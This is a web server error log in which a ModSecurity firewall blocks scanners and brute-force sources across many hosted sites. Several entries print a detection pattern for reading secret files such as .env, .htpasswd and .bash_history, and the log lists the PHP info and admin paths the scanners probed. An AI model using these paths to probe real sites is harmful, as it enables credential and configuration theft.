[Tue May 26 13:07:09.788321 2026] [security2:error] [pid 485064:tid 485263] [client 176.65.139.236:52584] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dimensioncorporativa.com.co"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ7gAAAMo"]
[Tue May 26 13:07:09.856653 2026] [security2:error] [pid 485064:tid 485230] [client 176.65.139.229:25458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ8gAAAKk"]
[Tue May 26 13:07:09.858698 2026] [security2:error] [pid 485064:tid 485264] [client 176.65.139.233:58234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ8wAAAMs"]
[Tue May 26 13:07:09.863929 2026] [security2:error] [pid 485064:tid 485267] [client 176.65.139.232:61746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.consola.jhonweb.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ9AAAAM4"]
[Tue May 26 13:07:09.866972 2026] [security2:error] [pid 485064:tid 485215] [client 176.65.139.231:63134] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimensioncorporativa.jhonweb.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ9QAAAJo"]
[Tue May 26 13:07:09.870920 2026] [security2:error] [pid 485064:tid 485224] [client 176.65.139.235:35744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.jhonparra.jhonweb.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ9gAAAKM"]
[Tue May 26 13:07:09.876562 2026] [security2:error] [pid 485064:tid 485288] [client 176.65.139.234:35532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ-AAAAOM"]
[Tue May 26 13:07:09.876755 2026] [security2:error] [pid 485064:tid 485217] [client 176.65.139.231:63132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ9wAAAJw"]
[Tue May 26 13:07:10.996944 2026] [security2:error] [pid 485064:tid 485108] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/test.php"] [unique_id "ahVNpj9tlF55stOmSqEaKwAAsSs"]
[Tue May 26 13:07:13.641886 2026] [security2:error] [pid 485064:tid 485277] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNqT9tlF55stOmSqEafAAAANg"]
[Tue May 26 13:07:14.210366 2026] [security2:error] [pid 485064:tid 485227] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNqT9tlF55stOmSqEanwAAAKY"]
[Tue May 26 13:07:14.228467 2026] [security2:error] [pid 485064:tid 485111] [remote 46.62.185.67:53468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVNqj9tlF55stOmSqEarwABAS4"]
[Tue May 26 13:07:14.686820 2026] [security2:error] [pid 485064:tid 485116] [remote 8.130.10.226:51846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.10.130.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVNqj9tlF55stOmSqEavQAAvzM"]
[Tue May 26 13:07:16.557896 2026] [security2:error] [pid 485064:tid 485222] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNrD9tlF55stOmSqEbBQAAAKE"]
[Tue May 26 13:07:18.567563 2026] [security2:error] [pid 485064:tid 485321] [client 20.104.227.76:28127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVNrj9tlF55stOmSqEbVwAAAQQ"]
[Tue May 26 13:07:18.741983 2026] [security2:error] [pid 485064:tid 485304] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNrj9tlF55stOmSqEbUgAAAPM"]
[Tue May 26 13:07:20.638983 2026] [authz_core:error] [pid 485064:tid 485321] [client 185.177.72.30:0] AH01630: client denied by server configuration: /home2/samayikp/public_html/error_log
[Tue May 26 13:07:21.304119 2026] [security2:error] [pid 485064:tid 485281] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNsD9tlF55stOmSqEbrAAAANw"]
[Tue May 26 13:07:21.465824 2026] [core:error] [pid 485064:tid 485258] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:07:21.465843 2026] [core:error] [pid 485064:tid 485258] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:07:21.568135 2026] [core:error] [pid 485064:tid 485218] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:07:21.568155 2026] [core:error] [pid 485064:tid 485218] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:07:22.752476 2026] [security2:error] [pid 485064:tid 485072] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/phpinfo.php"] [unique_id "ahVNsj9tlF55stOmSqEb-gAAvgc"]
[Tue May 26 13:07:23.007821 2026] [security2:error] [pid 485064:tid 485305] [client 182.9.36.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNsj9tlF55stOmSqEb7gAAAPQ"]
[Tue May 26 13:07:23.024681 2026] [security2:error] [pid 485064:tid 485222] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNsj9tlF55stOmSqEb8wAAAKE"]
[Tue May 26 13:07:23.127217 2026] [security2:error] [pid 485064:tid 485181] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/info.php"] [unique_id "ahVNsz9tlF55stOmSqEcCgAAs3Q"]
[Tue May 26 13:07:23.502536 2026] [security2:error] [pid 485064:tid 485078] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/pi.php"] [unique_id "ahVNsz9tlF55stOmSqEcFwAAig0"]
[Tue May 26 13:07:23.682972 2026] [security2:error] [pid 485064:tid 485074] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/php_info.php"] [unique_id "ahVNsz9tlF55stOmSqEcGwAAtAk"]
[Tue May 26 13:07:23.863651 2026] [security2:error] [pid 485064:tid 485071] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/i.php"] [unique_id "ahVNsz9tlF55stOmSqEcHwAApQY"]
[Tue May 26 13:07:24.044356 2026] [security2:error] [pid 485064:tid 485080] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/php.php"] [unique_id "ahVNtD9tlF55stOmSqEcIwAAzg8"]
[Tue May 26 13:07:24.225029 2026] [security2:error] [pid 485064:tid 485073] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/p.php"] [unique_id "ahVNtD9tlF55stOmSqEcJwAAkgg"]
[Tue May 26 13:07:24.601015 2026] [security2:error] [pid 485064:tid 485084] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/apc.php"] [unique_id "ahVNtD9tlF55stOmSqEcNwAA5xM"]
[Tue May 26 13:07:24.781551 2026] [security2:error] [pid 485064:tid 485091] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/opcache.php"] [unique_id "ahVNtD9tlF55stOmSqEcPAAAyho"]
[Tue May 26 13:07:24.962299 2026] [security2:error] [pid 485064:tid 485174] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/xcache.php"] [unique_id "ahVNtD9tlF55stOmSqEcPQAAz20"]
[Tue May 26 13:07:25.143565 2026] [security2:error] [pid 485064:tid 485112] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/memcache.php"] [unique_id "ahVNtT9tlF55stOmSqEcRAAAnS8"]
[Tue May 26 13:07:25.324344 2026] [security2:error] [pid 485064:tid 485133] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/redis.php"] [unique_id "ahVNtT9tlF55stOmSqEcRQAA7UQ"]
[Tue May 26 13:07:25.506364 2026] [security2:error] [pid 485064:tid 485066] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "724"] [id "340114"] [rev "2"] [msg "Atomicorp.com WAF Rules: Apache admin service access attempt"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/server-info"] [unique_id "ahVNtT9tlF55stOmSqEcUwAApwE"]
[Tue May 26 13:07:25.685135 2026] [security2:error] [pid 485064:tid 485216] [client 52.167.144.208:31220] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.vcresco.com"] [uri "/index.php"] [unique_id "ahVNtD9tlF55stOmSqEcOwAAAJs"]
[Tue May 26 13:07:25.748536 2026] [access_compat:error] [pid 485064:tid 485100] [remote 185.177.72.30:4522] AH01797: client denied by server configuration: proxy:https://127.0.0.1:8443/server-status
[Tue May 26 13:07:25.857127 2026] [security2:error] [pid 485064:tid 485245] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNtT9tlF55stOmSqEcSAAAALg"]
[Tue May 26 13:07:25.940798 2026] [access_compat:error] [pid 485064:tid 485117] [remote 185.177.72.30:4522] AH01797: client denied by server configuration: proxy:https://127.0.0.1:8443/server-status/
[Tue May 26 13:07:28.414693 2026] [security2:error] [pid 485064:tid 485195] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNtz9tlF55stOmSqEcqgAAAIY"]
[Tue May 26 13:07:30.784694 2026] [security2:error] [pid 485064:tid 485264] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNuj9tlF55stOmSqEdIAAAAMs"]
[Tue May 26 13:07:32.565420 2026] [security2:error] [pid 485064:tid 485144] [remote 123.30.233.13:45944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVNvD9tlF55stOmSqEddgAApk8"]
[Tue May 26 13:07:33.108104 2026] [security2:error] [pid 485064:tid 485306] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNvD9tlF55stOmSqEdhwAAAPU"]
[Tue May 26 13:07:34.890256 2026] [security2:error] [pid 485064:tid 485296] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNvj9tlF55stOmSqEdzgAAAOs"]
[Tue May 26 13:07:35.837946 2026] [security2:error] [pid 485064:tid 485134] [remote 209.145.62.147:46756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.62.145.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVNvz9tlF55stOmSqEd9wAA2UU"]
[Tue May 26 13:07:37.693755 2026] [security2:error] [pid 485064:tid 485214] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNwT9tlF55stOmSqEeLgAAAJk"]
[Tue May 26 13:07:39.088107 2026] [security2:error] [pid 485064:tid 485074] [remote 216.185.214.209:39502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVNwj9tlF55stOmSqEefAAAxAk"]
[Tue May 26 13:07:40.113215 2026] [security2:error] [pid 485064:tid 485218] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNwz9tlF55stOmSqEeowAAAJ0"]
[Tue May 26 13:07:41.494011 2026] [security2:error] [pid 485064:tid 485173] [remote 20.153.140.50:55928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVNxT9tlF55stOmSqEe2wAAuWw"]
[Tue May 26 13:07:42.675531 2026] [security2:error] [pid 485064:tid 485294] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNxj9tlF55stOmSqEe_QAAAOk"]
[Tue May 26 13:07:45.061660 2026] [security2:error] [pid 485064:tid 485260] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNyD9tlF55stOmSqEfWAAAAMc"]
[Tue May 26 13:07:46.936262 2026] [security2:error] [pid 485064:tid 485274] [client 47.128.27.115:17310] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rabbanitradingcompany.com"] [uri "/robots.txt"] [unique_id "ahVNyj9tlF55stOmSqEfrQAAANU"]
[Tue May 26 13:07:47.411051 2026] [security2:error] [pid 485064:tid 485293] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNyj9tlF55stOmSqEfsAAAAOg"]
[Tue May 26 13:07:48.869945 2026] [security2:error] [pid 485064:tid 485214] [client 51.91.120.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNzD9tlF55stOmSqEf4QAAAJk"]
[Tue May 26 13:07:49.225116 2026] [security2:error] [pid 485064:tid 485317] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNzD9tlF55stOmSqEf9QAAAQA"]
[Tue May 26 13:07:49.475677 2026] [autoindex:error] [pid 485064:tid 485233] [client 15.204.183.221:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:07:49.747901 2026] [security2:error] [pid 485064:tid 485137] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/adminer.php"] [unique_id "ahVNzT9tlF55stOmSqEgEQAAwEg"]
[Tue May 26 13:07:52.192839 2026] [security2:error] [pid 485064:tid 485229] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNzz9tlF55stOmSqEgWgAAAKg"]
[Tue May 26 13:07:54.702434 2026] [security2:error] [pid 485064:tid 485294] [client 74.7.228.39:40636] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.katalystconsulting.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVN0j9tlF55stOmSqEg0AAA6Q8"]
[Tue May 26 13:07:55.149490 2026] [security2:error] [pid 485064:tid 485079] [remote 46.101.54.125:44072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVN0j9tlF55stOmSqEg4wAAng4"]
